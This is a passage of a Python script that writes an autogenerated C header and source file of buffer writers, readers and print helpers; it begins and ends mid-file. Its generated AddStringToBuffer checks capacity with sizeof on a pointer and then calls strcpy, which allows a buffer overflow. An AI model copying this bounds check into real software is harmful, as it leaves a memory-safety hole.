Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (uint8_t *buffer, uint16_t newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.ENUM]: hfile.write ('// Add a 32 bit value to the buffer\n') hfile.write ('// Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (uint8_t *buffer, uint32_t newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.DOUBLE]: hfile.write ('// Add a 64 bit value to the buffer\n') hfile.write ('// Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (uint8_t *buffer, uint64_t newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') if hasArgOfType[ArArgType.STRING]: hfile.write ('// Add a NULL Terminated String to the buffer\n') hfile.write ('// Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddStringToBuffer') + ' (uint8_t *buffer, const char *newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') if hasArgOfType[ArArgType.FLOAT]: hfile.write ('// Add a float to the buffer\n') hfile.write ('// Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddFloatToBuffer') + ' (uint8_t *buffer, float newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') if hasArgOfType[ArArgType.DOUBLE]: hfile.write ('// Add a double to the buffer\n') hfile.write ('// Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddDoubleToBuffer') + ' (uint8_t *buffer, double newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') hfile.write ('// ------- //\n') hfile.write ('// READERS //\n') hfile.write ('// ------- //\n') hfile.write ('\n') if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]: hfile.write ('// Read an 8 bit value from the buffer\n') hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') hfile.write ('uint8_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]: hfile.write ('// Read a 16 bit value from the buffer\n') hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') hfile.write ('uint16_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]: hfile.write ('// Read a 32 bit value from the buffer\n') hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') hfile.write ('uint32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64]: hfile.write ('// Read a 64 bit value from the buffer\n') hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') hfile.write ('uint64_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') if hasArgOfType[ArArgType.FLOAT]: hfile.write ('// Read a float value from the buffer\n') hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') hfile.write ('float ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') if hasArgOfType[ArArgType.DOUBLE]: hfile.write ('// Read a double value from the buffer\n') hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') hfile.write ('double ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') if hasArgOfType[ArArgType.STRING]: hfile.write ('// Read a string value from the buffer\n') hfile.write ('// On error, return NULL and set *error to 1, else set *error to 0\n') hfile.write ('const char* ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n') hfile.write ('\n') hfile.write ('// -------- //\n') hfile.write ('// TOSTRING //\n') hfile.write ('// -------- //\n') hfile.write ('\n') if (hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8] or hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16] or hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.DOUBLE] or hasArgOfType[ArArgType.STRING] or hasArgOfType[ArArgType.ENUM]): hfile.write ('// Write a string in a buffer\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (const char *stringToWrite, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U8]: hfile.write ('// Write a string in a buffer from an uint8_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8') + ' (const char *name, uint8_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.I8]: hfile.write ('// Write a string in a buffer from an int8_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8') + ' (const char *name, int8_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U16]: hfile.write ('// Write a string in a buffer from an uint16_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16') + ' (const char *name, uint16_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.I16]: hfile.write ('// Write a string in a buffer from an int16_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16') + ' (const char *name, int16_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U32]: hfile.write ('// Write a string in a buffer from an uint32_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32') + ' (const char *name, uint32_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]: hfile.write ('// Write a string in a buffer from an int32_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') + ' (const char *name, int32_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U64]: hfile.write ('// Write a string in a buffer from an uint64_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64') + ' (const char *name, uint64_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.I64]: hfile.write ('// Write a string in a buffer from an int64_t arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64') + ' (const char *name, int64_t arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.FLOAT]: hfile.write ('// Write a string in a buffer from float arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat') + ' (const char *name, float arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.DOUBLE]: hfile.write ('// Write a string in a buffer from a double arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble') + ' (const char *name, double arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') if hasArgOfType[ArArgType.STRING]: hfile.write ('// Write a string in a buffer from a string arg\n') hfile.write ('// On error, return -1, else return offset in string\n') hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString') + ' (const char *name, const char *arg, char *output, int outputLen, int outputOffset);\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('#endif /* ' + COMMANDSRW_DEFINE + ' */\n') hfile.close () ################################# # 3RD PART : # ################################# # Generate private ReadWrite C # # file # ################################# cfile = open (paths.COMMANDSRW_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <config.h>\n') cfile.write ('#include <stdio.h>\n') cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n') cfile.write ('#include <libARSAL/ARSAL_Endianness.h>\n') cfile.write ('\n') cfile.write ('// ------- //\n') cfile.write ('// WRITERS //\n') cfile.write ('// ------- //\n') cfile.write ('\n') if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]: cfile.write ('// Add an 8 bit value to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (uint8_t *buffer, uint8_t newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' int32_t retVal = 0;\n') cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n') cfile.write ('\n') cfile.write (' if (buffCap < size)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n') cfile.write (' uint8_t localVal = newVal;\n') cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n') cfile.write (' retVal = oldOffset + sizeof (localVal);\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]: cfile.write ('// Add a 16 bit value to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (uint8_t *buffer, uint16_t newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' int32_t retVal = 0;\n') cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n') cfile.write ('\n') cfile.write (' if (buffCap < size)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n') cfile.write (' uint16_t localVal = htods (newVal);\n') cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n') cfile.write (' retVal = oldOffset + sizeof (localVal);\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.ENUM]: cfile.write ('// Add a 32 bit value to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (uint8_t *buffer, uint32_t newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' int32_t retVal = 0;\n') cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n') cfile.write ('\n') cfile.write (' if (buffCap < size)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n') cfile.write (' uint32_t localVal = htodl (newVal);\n') cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n') cfile.write (' retVal = oldOffset + sizeof (localVal);\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.DOUBLE]: cfile.write ('// Add a 64 bit value to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (uint8_t *buffer, uint64_t newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' int32_t retVal = 0;\n') cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n') cfile.write ('\n') cfile.write (' if (buffCap < size)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n') cfile.write (' uint64_t localVal = htodll (newVal);\n') cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n') cfile.write (' retVal = oldOffset + sizeof (localVal);\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.STRING]: cfile.write ('// Add a NULL Terminated String to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddStringToBuffer') + ' (uint8_t *buffer, const char *newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' int32_t retVal = 0;\n') cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n') cfile.write ('\n') cfile.write (' if (buffCap < size)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' char *buffptr = (char *)& (buffer [oldOffset]);\n') cfile.write (' strcpy (buffptr, newVal);\n') cfile.write (' retVal = oldOffset + strlen (newVal) + 1;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.FLOAT]: cfile.write ('// Add a float to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddFloatToBuffer') + ' (uint8_t *buffer, float newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' union {\n') cfile.write (' float f;\n') cfile.write (' uint32_t u32;\n') cfile.write (' } val = { .f = newVal };\n') cfile.write (' return ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (buffer, val.u32, oldOffset, buffCap);\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.DOUBLE]: cfile.write ('// Add a double to the buffer\n') cfile.write ('// Returns -1 if the buffer is not big enough\n') cfile.write ('// Returns the new offset in the buffer on success\n') cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddDoubleToBuffer') + ' (uint8_t *buffer, double newVal, int32_t oldOffset, int32_t buffCap)\n') cfile.write ('{\n') cfile.write (' union {\n') cfile.write (' double d;\n') cfile.write (' uint64_t u64;\n') cfile.write (' } val = { .d = newVal };\n') cfile.write (' return ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (buffer, val.u64, oldOffset, buffCap);\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('// ------- //\n') cfile.write ('// READERS //\n') cfile.write ('// ------- //\n') cfile.write ('\n') if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]: cfile.write ('// Read an 8 bit value from the buffer\n') cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') cfile.write ('uint8_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' uint8_t retVal = 0;\n') cfile.write (' int newOffset = *offset + sizeof (uint8_t);\n') cfile.write (' if (newOffset > capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = buffer [*offset];\n') cfile.write (' *offset = newOffset;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]: cfile.write ('// Read a 16 bit value from the buffer\n') cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') cfile.write ('uint16_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' uint16_t retVal = 0;\n') cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n') cfile.write (' int newOffset = *offset + sizeof (uint16_t);\n') cfile.write (' if (newOffset > capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint16_t));\n') cfile.write (' retVal = dtohs (retVal);\n') cfile.write (' *offset = newOffset;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]: cfile.write ('// Read a 32 bit value from the buffer\n') cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') cfile.write ('uint32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' uint32_t retVal = 0;\n') cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n') cfile.write (' int newOffset = *offset + sizeof (uint32_t);\n') cfile.write (' if (newOffset > capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint32_t));\n') cfile.write (' retVal = dtohl (retVal);\n') cfile.write (' *offset = newOffset;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64]: cfile.write ('// Read a 64 bit value from the buffer\n') cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') cfile.write ('uint64_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' uint64_t retVal = 0;\n') cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n') cfile.write (' int newOffset = *offset + sizeof (uint64_t);\n') cfile.write (' if (newOffset > capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint64_t));\n') cfile.write (' retVal = dtohll (retVal);\n') cfile.write (' *offset = newOffset;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.FLOAT]: cfile.write ('// Read a float value from the buffer\n') cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') cfile.write ('float ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' float retVal = 0;\n') cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n') cfile.write (' int newOffset = *offset + sizeof (float);\n') cfile.write (' if (newOffset > capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' memcpy (&retVal, buffAddr, sizeof (float));\n') cfile.write (' retVal = dtohf (retVal);\n') cfile.write (' *offset = newOffset;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.DOUBLE]: cfile.write ('// Read a double value from the buffer\n') cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n') cfile.write ('double ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' double retVal = 0;\n') cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n') cfile.write (' int newOffset = *offset + sizeof (double);\n') cfile.write (' if (newOffset > capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' memcpy (&retVal, buffAddr, sizeof (double));\n') cfile.write (' retVal = dtohd (retVal);\n') cfile.write (' *offset = newOffset;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.STRING]: cfile.write ('// Read a string value from the buffer\n') cfile.write ('// On error, return NULL and set *error to 1, else set *error to 0\n') cfile.write ('const char* ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' const char *retVal = NULL;\n') cfile.write (' const char *buffAddr = (char *)&buffer[*offset];\n') cfile.write (' int newOffset = *offset;\n') cfile.write (' while ((newOffset < capacity) && (\'\\0\' != (char) buffer [newOffset]))\n') cfile.write (' {\n') cfile.write (' newOffset += sizeof (char);\n'); cfile.write (' }\n') cfile.write (' if (newOffset >= capacity)\n') cfile.write (' {\n') cfile.write (' *error = 1;\n'); cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = buffAddr;\n') cfile.write (' *offset = newOffset + 1;\n') cfile.write (' *error = 0;\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('// -------- //\n') cfile.write ('// TOSTRING //\n') cfile.write ('// -------- //\n') cfile.write ('\n') if (hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8] or hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16] or hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.DOUBLE] or hasArgOfType[ArArgType.STRING] or hasArgOfType[ArArgType.ENUM]): cfile.write ('// Write a string in a buffer\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (const char *stringToWrite, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int retVal = -1;\n') cfile.write (' int capacity = outputLen - outputOffset - 1;\n') cfile.write (' int len = strlen (stringToWrite);\n') cfile.write (' if (capacity >= len)\n') cfile.write (' {\n') cfile.write (' strncat (output, stringToWrite, len);\n') cfile.write (' retVal = outputOffset + len;\n') cfile.write (' } // No else --> If capacity is not enough, keep retVal to -1\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U8]: cfile.write ('// Write a string in a buffer from an uint8_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8') + ' (const char *name, uint8_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = -1;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRIU8\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu8, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.I8]: cfile.write ('// Write a string in a buffer from an int8_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8') + ' (const char *name, int8_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = -1;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRII8\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi8, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U16]: cfile.write ('// Write a string in a buffer from an uint16_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16') + ' (const char *name, uint16_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = -1;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRIU16\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu16, arg);\n') 